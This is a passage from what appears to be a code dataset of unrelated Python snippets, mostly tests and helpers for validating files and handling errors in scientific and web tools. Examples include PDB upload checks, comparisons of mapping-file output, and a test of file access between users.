\\\n len(expected.properties), \\\n 'The length of the result and expected properties lists do not match.'\n assert getattr(results, \"ids\", None) is None, \\\n 'Result ids should be None'\n assert getattr(results, 'source', None) is None, \\\n 'Result source should be None'\n assert getattr(results, 'quantity', None) is None, \\\n 'Result quantity should be None'\n assert getattr(results, 'preparation', None) is None,\\\n 'Result preparation should be None'\n assert getattr(results, \"subSystems\", None) is None, \\\n 'Results subSystem should be None'\n assert getattr(results, 'references', None) is None,\\\n 'Results references should be None'\n assert getattr(results, 'contacts', None) is None, \\\n 'Results contacts should be None'\n assert getattr(results, 'licenses', None) is None,\\\n 'Results licenses should be None'\n assert getattr(results,'tags', None) is None,\\\n 'Results tags should be None'", "def testIgnoredError(self):\n cmds = \"\"\"-chown 0 missingFile\npwd\nexit\n\"\"\"\n def _cbCheckResult(res):\n self.assertIn(self.testDir.asBytesMode().path, res)\n\n d = self._getBatchOutput(cmds)\n d.addCallback(_cbCheckResult)\n return d", "def test_differ_times_two_files(generate_differ_times_two_files):\n fname = generate_differ_times_two_files\n with pytest.raises(Exception):\n process_files([fname[0], fname[1]])", "def overlapping_atoms(cifs):\n messages = []\n\n for cif in cifs:\n try:\n atoms = io.read(cif)\n except Exception as exc:\n raise ValueError(f'Unable to parse file {cif}') from exc\n overlaps = geometry.get_duplicate_atoms(atoms, cutoff=0.1)\n if len(overlaps) != 0:\n messages.append(f'Overlapping atoms detected in {cif}')\n \n if messages:\n print(messages)\n sys.exit(1)\n\n print('No overlapping atoms found.')", "def test_filter_file_exceptions_early_dupes():\n exceptions = Exceptions(os.path.join(os.path.dirname(__file__),\n 'early_exceptions.yaml'))\n\n package = Package('test', os.path.dirname(__file__))\n files = [os.path.join(os.path.dirname(__file__),\n 'unlikelystring'),\n os.path.join(os.path.dirname(__file__),\n 'unlikelystring')]\n\n filtered_files = exceptions.filter_file_exceptions_early(package, files)\n\n assert not filtered_files", "def assert_files_equal(file1, file2, error_msg='file mismatch'):\n\n bufsize = 0x1000\n block_offset = 0\n with open(file1, 'rb') as fp1, open(file2, 'rb') as fp2:\n while True:\n block1 = bytearray(fp1.read(bufsize))\n block2 = bytearray(fp2.read(bufsize))\n if len(block1) < len(block2):\n raise TestException(error_msg + ': file1 shorter than file2')\n elif len(block1) > len(block2):\n raise TestException(error_msg + ': file1 longer than file2')\n\n if block1 != block2:\n for offset, (val1, val2) in enumerate(zip(block1, block2)):\n if val1 != val2:\n # Show the difference\n exception_text = error_msg + ':\\n'\n rounded_offset = offset & ~15\n exception_text += '{:08x} '.format(block_offset +\n rounded_offset)\n for lineoffs in range(16):\n exception_text += '{:02x}'.format(\n block1[rounded_offset + lineoffs])\n\n exception_text += '\\n{:08x} '.format(\n block_offset + rounded_offset)\n for lineoffs in range(16):\n exception_text += '{:02x}'.format(\n block2[rounded_offset + lineoffs])\n\n exception_text += '\\n '\n for lineoffs in range(16):\n if block1[rounded_offset + lineoffs] \\\n != block2[rounded_offset + lineoffs]:\n exception_text += '^^'\n else:\n exception_text += ' '\n\n raise TestException(exception_text)\n\n if not block1:\n return\n\n block_offset += len(block1)", "def test_missingDetectors(self):\n files = [getFile(fp)\n for fp in ['bwr_0_det0.m', 'bwr_noxy_det0.m']]\n self._raisesMisMatchError(files)\n self.assertMsgInLogs(\"ERROR\", \"detectors: Parser files\", partial=True)", "def test_concatenate_errors(self):\n header = BDFHeader.from_path(TestData.bdf_2048)\n header2 = BDFHeader.from_path(TestData.bdf_256)\n with pytest.raises(ValueError):\n header.concatenate(header2)", "def verify_results(outdir_path, original_array_path, R, O, file_format, addition, split_merge=False):\n\n if file_format == \"HDF5\":\n file_manager = HDF5_manager()\n else:\n print(\"File format not supported yet. Aborting...\")\n sys.exit(1)\n\n partition = get_blocks_shape(R, O)\n orig_arr_data = file_manager.read_all(original_array_path)\n all_true = True\n\n if split_merge:\n result_arrpath = os.path.join(outdir_path, \"0_0_0.hdf5\")\n return file_manager.check_split_merge(original_array_path, result_arrpath)\n\n for i in range(partition[0]):\n for j in range(partition[1]):\n for k in range(partition[2]):\n outfilepath = os.path.join(outdir_path, str(i) + \"_\" + str(j) + \"_\" + str(k) + \".hdf5\")\n data_stored = file_manager.read_all(outfilepath)\n ground_truth = orig_arr_data[i*O[0]:(i+1)*O[0],j*O[1]:(j+1)*O[1],k*O[2]:(k+1)*O[2]]\n \n if addition:\n ground_truth = ground_truth +1\n\n try:\n assert np.allclose(data_stored, ground_truth, rtol=1e-02)\n # print(f\"Good output file {outfilepath}\")\n except:\n print(f\"Error: bad rechunking {outfilepath}\")\n print(f\"Slices from ground truth {i*O[0]}:{(i+1)*O[0]}, {j*O[1]}:{(j+1)*O[1]}, {k*O[2]}:{(k+1)*O[2]}\")\n print(\"data_stored\", data_stored)\n print(\"ground_truth\", ground_truth)\n all_true = False # do not return here to see all failures\n\n file_manager.close_infiles() # close all files\n return all_true", "def test_collisions_file_path(self):\n self.assertRaises(ValueError, collisions_clean, \"not_a_file_path\")", "def check_upload(job_id, file, mainchain = None):\n ## NOTE:\n ## - Requires uploaded structures to be X-ray EXPDTA\n ## - Checks if the PDB file contains valid aa/na residues\n ## - PDB file must have at least 30 ATOMs\n ## - PDB file can not have lowercase alt. res. numbers\n ## - Checks standard deviation of temp. factors\n ## - Checks that not all occupancies are 0.00\n ## - Checks for properly formatted ATOM lines\n tmpfile = None ## this is the second part of the return\n atom_num = []\n res_type = []\n res_num = []\n chain = []\n temp_factors = []\n bad_std = -1\n num_total = 0\n num_good = 0\n occupancy = 0.0\n ignore = 0\n line_num = 0\n\n for line in file:\n line_num += 1\n\n if line.startswith('HEADER'):\n header_id = re.sub(r\"^HEADER.{56}(....)\", '\\\\1', line).strip()\n ## FIXME: Calls to MySQL can not be made in this def, 2009-06-16\n #mysql.job_set_header_id(job_id, str(header_id))\n\n #if line.startswith('EXPDTA NMR') or \\\n # line.startswith('EXPDTA SOLUTION NMR'):\n # ## TODO: Might need to add \"SOLID-STATE NMR\", 2009-11-10\n # msg = \"NMR structure! \"\n # msg += \"Please do not submit NMR structures, theoretical models, \"\n # msg += \"or any PDB file with unrefined Bs.\"\n # return msg\n\n elif line.startswith('EXPDTA') and line.find('X-RAY DIFFRACTION') == -1:\n msg = \"Not an X-ray diffraction structure. TLSMD currently only \"\n msg += \"performs analysis on X-ray models. Will not proceed.\"\n return msg, tmpfile\n\n elif re.match(r'^REMARK 2 RESOLUTION\\. ([0-9\\.]{1,}) ANGSTROMS.*', line):\n resolution = re.sub(r'^REMARK 2 RESOLUTION\\. ([0-9\\.]{1,}) ANGSTROMS.*', '\\\\1', line).strip()\n ## FIXME: Calls to MySQL can not be made in this def, 2009-06-16\n #mysql.job_set_resolution(job_id, resolution)\n\n elif re.match('^ATOM.....................[0-9][a-z]', line):\n ## E.g., Don't allow \"100b\". Force it to be \"100B\"\n example = re.sub(r'^ATOM.....................([0-9][a-z]).*', '\\\\1', line).strip()\n msg = \"Please change lowercase to uppercase for alternate \"\n msg += \"residue numbers. (E.g., change \\\" %s \\\" to \\\" %s \\\")\" % (\n example, example.upper())\n return msg, tmpfile\n\n elif mainchain == True and line.startswith('ATOM') and \\\n const.RE_MAINCHAIN_ATOMS.match(line) and \\\n Library.library_is_standard_residue(line[17:20].strip()):\n ## Only pass mainchain atoms to the running_stddev() function\n tmpfile = misc.generate_security_code()\n num_total += 1\n\n try:\n int(line[7:11].strip())\n int(line[23:26].strip())\n float(line[56:60].strip())\n float(line[60:66].strip())\n except:\n return \"Not a proper ATOM line: <pre>%s</pre>\" % line, tmpfile\n\n if float(line[56:60].strip()) < 1.00:\n ## ignore occupancies < 1.00\n ignore += 1\n continue\n else:\n num_good += 1\n atom_num.append(int(line[7:11].strip()))\n res_type.append(line[17:20].strip())\n res_num.append(int(line[23:26].strip()))\n chain.append(line[21:22])\n occupancy += float(line[56:60].strip())\n temp_factors.append(float(line[60:66].strip()))\n\n elif mainchain == False and line.startswith('ATOM') and (\n Library.library_is_standard_residue(line[17:20].strip())):\n tmpfile = job_id\n num_total += 1\n\n try:\n int(line[7:11].strip())\n int(line[23:26].strip())\n float(line[56:60].strip())\n float(line[60:66].strip())\n except:\n return \"Not a proper ATOM line: <pre>%s</pre>\" % line, tmpfile\n\n if float(line[56:60].strip()) < 1.00:\n ## ignore occupancies < 1.00\n ignore += 1\n continue\n else:\n num_good += 1\n atom_num.append(int(line[7:11].strip()))\n res_type.append(line[17:20].strip())\n res_num.append(int(line[23:26].strip()))\n chain.append(line[21:22])\n occupancy += float(line[56:60].strip())\n temp_factors.append(float(line[60:66].strip()))\n\n else:\n continue\n\n #return \"Number of atoms: %s (%s) (%s)\" % (num_total, len(temp_factors), num_good)\n\n ## TODO: Add check for ANISOU that are pure ISOT, 2010-03-23\n\n ## FIXME: This does not work yet.\n #if(ignore == num_total):\n # return \"All occupancies are less than 1.0, so all atoms will be ignored. Nothing to do.\"\n\n msg = \"Not a PDB structure or has unrecognized residue names.\"\n if mainchain and num_good < 5:\n return msg, tmpfile\n elif not mainchain and num_good < 30:\n return msg, tmpfile\n\n if(occupancy / num_good == 0.0):\n return \"All occupancies are 0.0. TLSMD won't run on this structure.\", tmpfile\n\n bad_std, tmpfile = running_stddev(tmpfile, atom_num, res_type, res_num, \n chain, temp_factors)\n if bad_std > 0:\n ## If there are a string of \"bad\" B-factors, return a plot showing the\n ## \"bad\" regions and do not proceed any further in the analysis.\n f = open('%s/%s.gnu' % (conf.WEBTMP_PATH, tmpfile), 'w')\n\n ## modify script template\n script = _STDDEV_FOR_BAD_TFACT_TEMPLATE\n script = script.replace(\"<webtmp_path>\", conf.WEBTMP_PATH)\n script = script.replace(\"<tmpfile>\", tmpfile)\n script = script.replace(\"<gnuplot_font>\", conf.GNUPLOT_FONT)\n #script = script.replace(\"<min_stddev_bfact>\", conf.MIN_STDDEV_BFACT)\n #script = script.replace(\"<max_stddev_bfact>\", conf.MAX_STDDEV_BFACT)\n\n f.write(script)\n f.close()\n subprocess.Popen([r\"%s\" % conf.GNUPLOT, \"%s/%s.gnu\" % (\n conf.WEBTMP_PATH, tmpfile)]).wait()\n\n return_string = \"Standard deviation of temperature factors is less \"\n return_string += \"than %s or greater than %s for those residues in \" % (\n conf.MIN_STDDEV_BFACT, conf.MAX_STDDEV_BFACT)\n return_string += \"the shaded regions below:<br>\"\n return_string += \"<center><img src='%s/%s.png'/></center>\" % (\n conf.WEBTMP_URL, tmpfile)\n return_string += \"<br><h3>NOTE: Your structure was run through a \"\n return_string += \"sanity check twice: (1) using all atoms in your \"\n return_string += \"structure; and (2) using only the mainchain atoms \"\n return_string += \"({N,CA,C,O,CB} or {P,O5*,C5*,C4*,C3*,O3*}). \"\n return_string += \"Both sanity checks failed.</h3>\"\n return return_string, tmpfile\n\n return '', tmpfile", "def test_check_mapping_file_errors(self):\r\n\r\n # Use data with errors, default parameters\r\n check_mapping_file(mapping_fp=self.errors_mapping_fp,\r\n output_dir=self.output_dir,\r\n verbose=False)\r\n\r\n # Check existence of expected output files\r\n output_html_fp = join(self.output_dir,\r\n basename(self.errors_mapping_fp).replace('.txt', '.html'))\r\n output_corrected_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_mapping_fp).replace('.txt', '_corrected.txt'))\r\n output_log_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_mapping_fp).replace('.txt', '.log'))\r\n overlib_js_fp = join(self.output_dir, 'overlib.js')\r\n\r\n self.assertTrue(exists(output_html_fp))\r\n self.assertTrue(exists(output_corrected_fp))\r\n self.assertTrue(exists(output_log_fp))\r\n self.assertTrue(exists(overlib_js_fp))\r\n\r\n # Check output data for expected results\r\n\r\n html_data = \"\".join([line for line in open(output_html_fp, \"U\")])\r\n corrected_data =\\\r\n \"\".join([line for line in open(output_corrected_fp, \"U\")])\r\n log_data = \"\".join([line for line in open(output_log_fp, \"U\")])\r\n\r\n self.assertEqual(html_data, self.expected_html_errors_output)\r\n self.assertEqual(corrected_data,\r\n self.expected_data_errors_corrected_output)\r\n self.assertEqual(log_data, self.expected_data_log_errors_output)", "def testFailedFiles(self):\n assert self.dummySubscription.failedFiles() == \\\n self.dummySubscription.failed.getFiles(type='set'), \\\n 'Method failedFiles does not return failed files Set'", "def test_multiple_users_cannot_access_each_others_files(self):\n userID1 = 'aaaabbbbccccdddd' # Create three users\n userID2 = 'aaaccccbbbddd'\n userID3 = 'bbbaaadddccccc'\n user1 = ServComs(self.serverIp, userID1)\n user2 = ServComs(self.serverIp, userID2)\n user3 = ServComs(self.serverIp, userID3)\n try:\n nonce1_1 = globals.generate_random_nonce()\n nonce1_2 = globals.generate_random_nonce()\n nonce2_1 = globals.generate_random_nonce()\n nonce2_2 = globals.generate_random_nonce()\n self.send_file(nonce1_1, nonce1_2, user1) # have two send a file\n self.send_file(nonce2_1, nonce2_2, user2)\n files_user_1 = user1.get_file_list() # get their files on server back\n files_user_2 = user2.get_file_list()\n files_user_3 = user3.get_file_list()\n self.assertTrue(len(files_user_3) == 0, # should have right lengths\n \"User 3 has send no files; should have no files.\")\n self.assertTrue(len(files_user_1) == 1 and len(files_user_2) == 1,\n \"User 1 & 2 has send 1 file; should have 1 file.\")\n for encfilename, nonce, ts in files_user_1: #\n self.assertTrue([encfilename, nonce] in [[x[0], x[1]] for x in files_user_1])\n self.assertTrue([encfilename, nonce] not in [[x[0], x[1]] for x in files_user_2])\n for encfilename, nonce, ts in files_user_2:\n self.assertTrue([encfilename, nonce] in [[x[0], x[1]] for x in files_user_2])\n self.assertTrue([encfilename, nonce] not in [[x[0], x[1]] for x in files_user_1])\n user1.get_file(files_user_1[0][0])\n user2.get_file(files_user_2[0][0])\n self.assertRaises(FileNotFoundError, user2.get_file, files_user_1[0][0])\n self.assertRaises(FileNotFoundError, user1.get_file, files_user_2[0][0])\n finally:\n self.unregister_user(userID1)\n self.unregister_user(userID2)\n self.unregister_user(userID3)", "def validate(self):\n for file_combination in self.get_result_combinations():\n # get to Job info for the given file\n # this is currently a work around\n job_info_a = self.find_job_info(file_combination[0])\n job_info_b = self.find_job_info(file_combination[1])\n\n provider_a = job_info_a['backend']\n provider_b = job_info_b['backend']\n result = {}\n\n # If both jobs returned results we can validate them against each other, we can still run the validation\n # if the files were previously downloaded\n if (job_info_a['download_successful'] and job_info_b['download_successful']) and \\\n (os.path.exists(file_combination[0]) and os.path.exists(file_combination[1])):\n for current_rule in self.ruleEngine.get_rules():\n current_rule.get_name_of_rule\n current_rule.set_results(file_combination)\n current_rule.set_directory(self.directory)\n\n result_of_rule = current_rule.apply()\n if result_of_rule is not None:\n result[current_rule.get_name_of_rule()] = result_of_rule\n else:\n result = {\n 'provider_a_download_successful': job_info_a['download_successful'],\n 'provider_b_download_successful': job_info_b['download_successful'],\n 'description': 'Validation could not be performed as atleast one provider did not return data, '\n 'if there are validation results it is because local results were used'\n }\n\n performance = {\n 'provider_a': job_info_a['time_to_result'],\n 'provider_b': job_info_b['time_to_result'],\n 'unit': 'seconds'\n }\n\n # Create the key for the provider\n if self._report.get(provider_a) is None:\n self._report[provider_a] = {'results': []}\n if self._report.get(provider_b) is None:\n self._report[provider_b] = {'results': []}\n\n self._report[provider_a]['results'].append({\n 'meta-information': {\n 'file_a': file_combination[0],\n 'file_b': file_combination[1],\n 'provider_a': provider_a,\n 'provider_b': provider_b,\n 'job-identifier': job_info_a['job'],\n 'provider-job-id_a': job_info_a['provider_job_id'],\n 'provider-job-id_b': job_info_b['provider_job_id'],\n 'performance': performance\n },\n 'rule_results': result\n })\n self._report[provider_b]['results'].append({\n 'meta-information': {\n 'file_a': file_combination[0],\n 'file_b': file_combination[1],\n 'compared_to_provider': provider_a,\n 'job-identifier': job_info_a['job'],\n 'provider-job-id_a': job_info_a['provider_job_id'],\n 'provider-job-id_b': job_info_b['provider_job_id'],\n 'performance': performance\n },\n 'rule_results': result\n })\n\n print('Images and job results analyzed!')\n print('Saving to report to disk')\n self.save_report()", "def test_error_before_all_processes_complete(self):\n first = \"\"\"file://B <- file://A\n sleep 1\n echo A produces B > B\n error\n \nfile://C <- file://A\n sleep 2\n echo A produces C > C\n \"\"\"\n\n rcode, output = run_tuttle_file(first, nb_workers=2)\n assert rcode == 2\n assert isfile('B')\n assert not isfile('C')\n w = Workflow.load()\n p = w.find_process_that_creates(\"file://C\")\n assert not p.success, \"Process that creates C should be in error in the dump\"", "def check_errors():\n\n for error in errors:\n ERROR('%s' % str(error))\n\n if len(errors) != 0:\n sys.exit(1)", "def test_check_mapping_file_errors_suppressed_bcs(self):\r\n\r\n # Should not flag bcs for errors with invalid characters\r\n check_mapping_file(mapping_fp=self.errors_mapping_fp,\r\n output_dir=self.output_dir,\r\n has_barcodes=False,\r\n char_replace=\"A\",\r\n verbose=False,\r\n variable_len_barcodes=True,\r\n disable_primer_check=True,\r\n added_demultiplex_field=None)\r\n\r\n # Check existence of expected output files\r\n output_html_fp = join(self.output_dir,\r\n basename(self.errors_mapping_fp).replace('.txt', '.html'))\r\n output_corrected_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_mapping_fp).replace('.txt', '_corrected.txt'))\r\n output_log_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_mapping_fp).replace('.txt', '.log'))\r\n overlib_js_fp = join(self.output_dir, 'overlib.js')\r\n\r\n self.assertTrue(exists(output_html_fp))\r\n self.assertTrue(exists(output_corrected_fp))\r\n self.assertTrue(exists(output_log_fp))\r\n self.assertTrue(exists(overlib_js_fp))\r\n\r\n # Check output data for expected results\r\n\r\n html_data = \"\".join([line for line in open(output_html_fp, \"U\")])\r\n corrected_data =\\\r\n \"\".join([line for line in open(output_corrected_fp, \"U\")])\r\n log_data = \"\".join([line for line in open(output_log_fp, \"U\")])\r\n\r\n self.assertEqual(html_data, self.expected_html_errors_suppressed_bcs)\r\n self.assertEqual(corrected_data,\r\n self.expected_data_errors_corrected_output)\r\n self.assertEqual(log_data,\r\n self.expected_output_log_errors_bcs_suppressed)", "def test_successful_file(self):\n\n url = '/%s/jobs/%i/input_files/' % (self.api, self.job.id)\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n results = result['results']\n self.assertEqual(len(results), 2)\n for result in results:\n self.assertTrue(result['id'] in [self.file3.id, self.file4.id])\n self.assertIn('file_name', result)\n self.assertIn('workspace', result)\n self.assertIn('media_type', result)\n self.assertIn('file_type', result)\n self.assertIn('file_size', result)\n self.assertIn('file_path', result)\n self.assertIn('is_deleted', result)\n self.assertIn('url', result)\n self.assertIn('created', result)\n self.assertIn('deleted', result)\n self.assertIn('data_started', result)\n self.assertIn('data_ended', result)\n self.assertIn('source_started', result)\n self.assertIn('source_ended', result)\n self.assertIn('last_modified', result)\n self.assertIn('geometry', result)\n self.assertIn('center_point', result)\n self.assertIn('countries', result)\n self.assertIn('job_type', result)\n self.assertIn('job', result)\n self.assertIn('job_exe', result)\n self.assertIn('job_output', result)\n self.assertIn('recipe_type', result)\n self.assertIn('recipe', result)\n self.assertIn('recipe_node', result)\n self.assertIn('batch', result)\n self.assertFalse(result['is_superseded'])\n self.assertIn('superseded', result)", "def init_error_files(self): \n \n dir_path = self.init_logs_directory()\n log_errors = self.join_path(dir_path, PATH_FOR_LOG_ERRORS)\n \n return log_errors", "def test_bad_number_of_files():\n with pytest.raises(Exception):\n process_files(['resources/simple_data.json', 'resources/simple_data.json', 'resources/simple_data.json'])\n with pytest.raises(Exception):\n process_files([])", "def test_do_not_need_alternate(self):\n os.unlink(os.path.join(self.reports_dir,\n 'TEST-testutil.manual_test.LintTest-fail.xml'\n ))\n os.unlink(os.path.join(self.reports_dir,\n 'TEST-testutil.manual_test.LintTest-success.xml'\n ))\n actual = self._analyze_make_output()\n self.assertEqual(1, actual)\n self.assertIn('E999 lint error from txt-file.', self.errors[0])", "def get_new_mast_error_files():\n rdict=dict()\n mastcontrol=dirutil.get_mast_control_path()\n mastscratch=dirutil.get_mast_scratch_path()\n olddirs=list()\n srecdirs = dirutil.immediate_subdirs(mastscratch)\n for srecdir in srecdirs:\n merrfile = os.path.join(mastscratch, srecdir, \"MAST_ERROR\")\n if os.path.isfile(merrfile):\n if not srecdir in rdict.keys():\n rdict[srecdir] = dict()\n rdict[srecdir][\"MAIN\"]=\"changed\"\n return rdict", "def test_time_not_in_two_files(generate_no_time_two_files):\n fname = generate_no_time_two_files\n with pytest.raises(Exception):\n process_files([fname[0], fname[1]])\n # process_files(['resources/simple_stress.json', 'resources/simple_strain.json'])", "def test_check_canonical_filenames(self):\n contents = self.read_metadata_contents()\n family_metadata = Metadata.get_family_metadata(contents)\n for font_metadata in family_metadata.fonts:\n canonical_filename = self.create_canonical_filename(font_metadata)\n if canonical_filename != font_metadata.filename:\n self.fail('{} != {}'.format(canonical_filename,\n font_metadata.filename))", "def merge_test_files():\n for syscall_type in SYSCALLS:\n self_file = open(f\"{TEMP_DIR}/{syscall_type}-self-split.test\")\n nonself_file = open(f\"{TEMP_DIR}/{syscall_type}-nonself-split.test\")\n merged_file = open(f\"{TEMP_DIR}/{syscall_type}-merged-split.test\", \"w\")\n merged_lines = self_file.readlines()\n merged_lines.extend(nonself_file.readlines())\n merged_file.writelines(merged_lines)\n self_file.close()\n nonself_file.close()\n merged_file.close()", "def test_multiples(self):\n\n checkit=subprocess.run([\"python\", \"../../taxonomy/src_files/validate_match_batch.py\", \"-i\", \"../resource_files/validate_folder2\", \"-m\", \"../resource_files/testing_good_mapfile.csv\"], capture_output=True, text=True)\n spl_folder=checkit.stdout.strip().split(\"/\")[-2]\n spl_output=\"{}/{}\".format(spl_folder, checkit.stdout.strip().split(\"/\")[-1])\n \n with open(\"../processed_files/{}\".format(spl_output), 'r') as f:\n get_lines=f.readlines()\n self.assertEqual(get_lines[0].strip(),\"id,query,blca,confidence,match\")\n self.assertEqual(get_lines[1].strip(),\"FC000001.01.02,Pretendbacterium bacterium,Pretendbacterium bacterium,16.3265306122,1\") # regular match\n self.assertEqual(get_lines[2].strip(),\"FC000002.01.02,Pretendbacterium bacterium2,Pretendbacterium bacterium2,16.3265306122,1\") # species only\n self.assertEqual(get_lines[3].strip(),\"FC000003.01.02,Pretendbacterium bacterium3,Pretendbacterium bacterium3,16.3265306122,1\") # number after genus, species only\n self.assertEqual(get_lines[4].strip(),\"FC000004.01.02,Pretendbacterium bacterium4 SK52 = DSM 20,Pretendbacterium bacterium4,16.3265306122,1\") # strain number in reference\n self.assertEqual(get_lines[5].strip(),\"FC000005.01.02,Pretendbacterium bacterium5 SK52 = DSM 20,Pretendbacterium bacterium5,16.3265306122,1\") # strain number in reference, species only\n \n print(\"removing ../processed_files/{}\".format(spl_folder))\n shutil.rmtree(\"../processed_files/{}\".format(spl_folder))", "def insert_good_data():\n get_file_reply(files[0][0], files[0][1])\n get_file_reply(files[1][0], files[1][1])", "def error_check(output_list):\n #NOTE: Add error messages as you come across them\n #keys = error messages we are looking for\n #values = what we log if the key is found\n known_errors = {\n \"File Not Found\":\"File was not found\",\n \"No such host is known\":\"Failed to connect to Client\"\n }\n #Verify the command ran without errors\n for _line in output_list:\n for key, value in known_errors.items():\n if key in _line:\n log.error(value)\n return False\n return True", "def testCTIcorrection(log, files, sigma=0.75, iterations=4, xcen=1900, ycen=1900, side=20):\n settings = dict(sigma=sigma, iterations=iterations)\n\n eclean = []\n e1clean = []\n e2clean = []\n R2clean = []\n eCTI = []\n e1CTI = []\n e2CTI = []\n R2CTI = []\n for file in files:\n #load no cti data\n nocti = pf.getdata(file.replace('CTI', 'nocti'))[ycen-side:ycen+side, xcen-side:xcen+side]\n #subtract background\n nocti -= 27.765714285714285\n nocti[nocti < 0.] = 0. #remove negative numbers\n\n #load CTI data\n CTI = pf.getdata(file)[ycen-side:ycen+side, xcen-side:xcen+side]\n CTI[CTI < 0.] = 0. #remove negative numbers\n\n sh = shape.shapeMeasurement(nocti, log, **settings)\n results = sh.measureRefinedEllipticity()\n\n eclean.append(results['ellipticity'])\n e1clean.append(results['e1'])\n e2clean.append(results['e2'])\n R2clean.append(results['R2'])\n\n sh = shape.shapeMeasurement(CTI, log, **settings)\n results = sh.measureRefinedEllipticity()\n\n eCTI.append(results['ellipticity'])\n e1CTI.append(results['e1'])\n e2CTI.append(results['e2'])\n R2CTI.append(results['R2'])\n\n results = {'eclean' : np.asarray(eclean),\n 'e1clean' : np.asarray(e1clean),\n 'e2clean' : np.asarray(e2clean),\n 'R2clean' : np.asarray(R2clean),\n 'eCTI' : np.asarray(eCTI),\n 'e1CTI' : np.asarray(e1CTI),\n 'e2CTI' : np.asarray(e2CTI),\n 'R2CTI' : np.asarray(R2CTI)}\n\n #save to a file\n fileIO.cPickleDumpDictionary(results, 'results.pk')\n\n return results", "def test_main_with_titanium_error(self):\n\n command = \" \".join( [\"%s/denoiser.py\" % get_qiime_scripts_dir(),\n \"--force\", \"-o\", self.test_dir,\n \"-i\", \"%s/qiime/support_files/denoiser/TestData/denoiser_test_set.sff.txt\" % PROJECT_HOME,\n \"-f\", \"%s/qiime/support_files/denoiser/TestData/test_set_seqs.fna\" % PROJECT_HOME,\n \"-e\", \"%s/qiime/support_files/denoiser/Data/Titanium_error_profile.dat\" % PROJECT_HOME] )\n\n result = Popen(command,shell=True,universal_newlines=True,\\\n stdout=PIPE,stderr=STDOUT).stdout.read()\n self.result_dir = self.test_dir\n \n observed = \"\".join(list(open(self.result_dir+ \"centroids.fasta\")))\n self.assertEqual(observed, self.expected)\n \n observed = \"\".join(list(open(self.result_dir+ \"denoiser_mapping.txt\")))\n self.assertEqual(observed,self.expected_titanium_map_string)", "def checkSuccess():\n try:\n relin = np.genfromtxt(\"{}reliability.in\".format(basedir), dtype=str)\n # Accurate argument order\n args = [str(\"\\'\"+probpath+\"\\'\"), str(\"\\'\"+obpath+\"\\'\"),\n str(\"\\'\"+outfile+\"\\'\"),\n fcsthr, str(\"\\'\"+variable+\"\\'\"),\n rthresh, sixhour, nbrhd, rbox_bounds[0],\n rbox_bounds[1], rbox_bounds[2], rbox_bounds[3]]\n success = True # Assume success initially\n # Ensure that each argument was placed into the proper line of the\n # reliability input file\n for ind, line in enumerate(relin):\n # If an argument doesn't line up with the rel in arg, set False\n print(str(args[ind]).replace('\\\\', ''), line)\n if (str(args[ind]).replace('\\\\', '') != line):\n success = False\n print(success)\n except:\n success = False\n return success", "def checkSuccess():\n try:\n relin = np.genfromtxt(\"{}reliability.in\".format(basedir), dtype=str)\n # Accurate argument order\n args = [str(\"\\'\"+probpath+\"\\'\"), str(\"\\'\"+obpath+\"\\'\"),\n str(\"\\'\"+outfile+\"\\'\"),\n fcsthr, str(\"\\'\"+variable+\"\\'\"),\n rthresh, sixhour, nbrhd, rbox_bounds[0],\n rbox_bounds[1], rbox_bounds[2], rbox_bounds[3]]\n success = True # Assume success initially\n # Ensure that each argument was placed into the proper line of the\n # reliability input file\n for ind, line in enumerate(relin):\n # If an argument doesn't line up with the rel in arg, set False\n print(str(args[ind]).replace('\\\\', ''), line)\n if (str(args[ind]).replace('\\\\', '') != line):\n success = False\n print(success)\n except:\n success = False\n return success", "def process_ecr(cas, cas_dir, sortiefile, ncsize):\n\n xcpt = [] # try all files for full report\n # ~~ copy output files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n for key in cas.out_files:\n submit = cas.out_files[key].split(';')\n tmp_file_name = submit[1]\n file_name = cas.values[key]\n if submit[5] == 'MULTI': # POSTEL3D\n npsize = 1\n while 1: # HORIZONTAL SECTION FILES\n file_name = path.join(cas_dir,\n file_name\\\n + '_{0:03d}'.format(npsize))\n if path.isfile(file_name):\n base, ext = path.splitext(file_name)\n i = 0\n # this would be an infinite loop only if you have an\n # inifite number of files\n while 1:\n i = i + 1\n if not path.isfile(base+'_old'+str(i)+ext):\n break\n shutil.move(file_name, base+'_old'+str(i)+ext)\n tmp_file_name = tmp_file_name+\\\n '_{0:03d}'.format(npsize)\n if not path.isfile(tmp_file_name):\n break\n shutil.move(tmp_file_name, file_name)\n print(' moving: '+ path.basename(file_name))\n npsize = npsize + 1\n npsize = 1\n while 1: # VERTICAL SECTION FILES\n nptime = 1\n v_file = tmp_file_name+\\\n '_{0:03d}'.format(npsize)+'-{0:03d}'.format(nptime)\n if not path.isfile(v_file):\n break\n while 1:\n file_name = path.join(cas_dir,\n file_name+\\\n '_{0:03d}'.format(npsize)+\\\n '-{0:03d}'.format(nptime))\n if path.isfile(file_name):\n base, ext = path.splitext(file_name)\n i = 0\n # this would be an infinite loop only if you have an\n # inifite number of files\n while 1:\n i = i + 1\n if not path.isfile(base+'_old'+str(i)+ext):\n break\n shutil.move(file_name, base+'_old'+str(i)+ext)\n tmp_file_name = tmp_file_name\\\n + '_{0:03d}'.format(npsize)\\\n + '-{0:03d}'.format(nptime)\n if not path.isfile(tmp_file_name):\n break\n shutil.move(tmp_file_name, file_name)\n print(' moving: '+ path.basename(file_name))\n nptime = nptime + 1\n npsize = npsize + 1\n # MAIN MODULE\n elif submit[5] == 'PARAL' and ncsize > 1:\n npsize = 0\n c_base, c_ext = path.splitext(file_name)\n while 1:\n file_name = path.join(cas_dir,\n c_base\\\n + '{0:05d}-{1:05d}'\\\n .format(ncsize-1, npsize)\\\n + c_ext)\n if path.isfile(file_name):\n base, ext = path.splitext(file_name)\n i = 0\n # this would be an infinite loop only if you have an\n # inifite number of files\n while 1:\n i = i + 1\n if not path.isfile(base+'_old'+str(i)+ext):\n break\n shutil.move(file_name, base+'_old'+str(i)+ext)\n tmp_file_name_par = tmp_file_name+\\\n '{0:05d}-{1:05d}'.format(ncsize-1, npsize)\n if not path.isfile(tmp_file_name_par):\n break\n shutil.move(tmp_file_name_par, file_name) #shutil.copy2(tmp_file_name,file_name)\n print(' moving: '+ 